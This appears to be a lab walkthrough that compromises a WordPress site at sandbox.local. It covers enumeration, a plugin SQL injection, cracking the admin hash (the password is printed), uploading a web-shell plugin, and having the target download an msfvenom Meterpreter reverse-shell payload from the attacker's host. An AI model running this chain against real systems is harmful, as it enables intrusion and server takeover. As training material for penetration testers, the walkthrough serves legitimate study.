# Enumerating Web App
We first do a directory scan/brute force to discover potentially sensitive files
```bash
dirb http://sandbox.local
```

We discovered several common WordPress directories, which will not reveal much. We use **WPScan** which is a WordPress Vulnerability scanner.
```bash
wpscan --url sandbox.local --enumerate ap,at,cb,dbe
```

**ap** - all plugins
**at** - all themes
**cb** - config backups
**dbe** - Db exports

From the **WPScan**, we discovered these plugins:
1. elementor
2. ocean-extra
3. wp-survey-and-poll

We search for exploits for the above plugins
```bash
searchsploit elementor
searchsploit ocean-extra
searchsploit wp-survey-and-poll

searchsploit ocean

searchsploit survey poll
```

We can make use of the survey poll SQL injection exploit to get the admin username (wp_ajla_admin) and password hash.

Saving the hash to a txt file, we can crack it using *John the Ripper*.
```bash
# Saving password hash to a file
echo '$P$BfBIi66MsPQgzmvYsUzwjc5vSx9L6i/' > pass.txt

john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

# !love29jan2006!
```

We can now log into the Admin dashboard interface.

# Enumerating the Admin interface
We can look through the Admin interface to discover the PHP version the server is running, as well as the Database IP.

Since we have administrative access, we can actually look to install PHP plugins, which can give us a PHP reverse shell or code execution.

One such plugin is *seclists*.
```bash
sudo apt install seclists

# Seclist directory
cd /usr/share/seclists/Web-Shells/WordPress
```

We can make use of **plugin-shell.php** to execute commands on the system.

# Obtaining a shell
Since WordPress expects plugins to be in a zip file, we package it as such.
```bash
cd /usr/share/seclists/Web-Shells/WordPress

sudo zip plugin-shell.zip plugin-shell.php
```

On the Admin interface, we can upload the plugin to be installed. Select the zipped pacakge.

Once installed, we can test the shell to see if it works by passing a cmd parameter from our Kali machine.
```bash
curl http://sandbox.local/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami
```

We can use Meterpreter to generate an ELF reverse shell payload since we know that the target is running Linux.

In order for the target to download the payload, we can host the generated payload on our Kali host with a Python http server.  Once downloaded, we can use the code execution to execute the payload and form a reverse shell.
```bash
# Generating payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<KALI-HOST> LPORT=443 -f elf > shell.elf

# Hosting file on Python HTTP server
sudo python3 -m http.server 80

# Using code execution to wget the payload from our Kali machine
curl http://sandbox.local/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=wget%20http://<KALI>/shell.elf


```



